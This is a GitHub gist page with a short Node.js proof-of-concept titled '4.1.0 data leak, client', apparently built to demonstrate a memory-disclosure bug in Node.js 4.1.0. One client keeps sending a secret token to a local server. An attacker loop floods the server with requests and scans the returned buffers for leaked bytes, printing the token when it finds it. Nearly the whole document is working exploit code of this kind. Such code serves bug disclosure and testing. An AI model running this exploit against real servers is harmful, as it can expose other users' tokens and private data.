Instantly share code, notes, and snippets.

Embed
What would you like to do?
4.1.0 data leak, client
// Two clients in one:
// valid() is the valid client that sends the token.
// attacker() makes the server to leak the data and inspects it.
var http = require('http');
var token = 'MySecretKey';
var fine = new Uint8Array(1000).toString();
function parse10(x) {
return parseInt(x, 10);
};
function attacker() {
http.request({host: 'localhost', port: 7777, path: '/file1'}, function(res) {
res.on('data', function() {});
}).end();
http.request({host: 'localhost', port: 7777, path: '/token/invalid'}, function(res) {
res.on('data', function (chunk) {
var data = chunk.toString();
if (data === fine) {
return;
}
data = new Buffer(data.split(',').map(parse10));
data = data.toString('utf-8');
if (data.indexOf(token) !== -1) {
console.log('found!');
console.log(data);
}
});
res.on('end', attacker);
}).end();
}
for (var i = 0; i < 10; i++) {
attacker();
}
function valid() {
var req = http.request({host: 'localhost', port: 7777, path: '/stuff/' + token, method: 'POST'}, function(res) {
res.on('data', function() {});
res.on('end', function() {
setTimeout(valid, 100);
});
});
req.write(token);
req.end();
}
valid();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment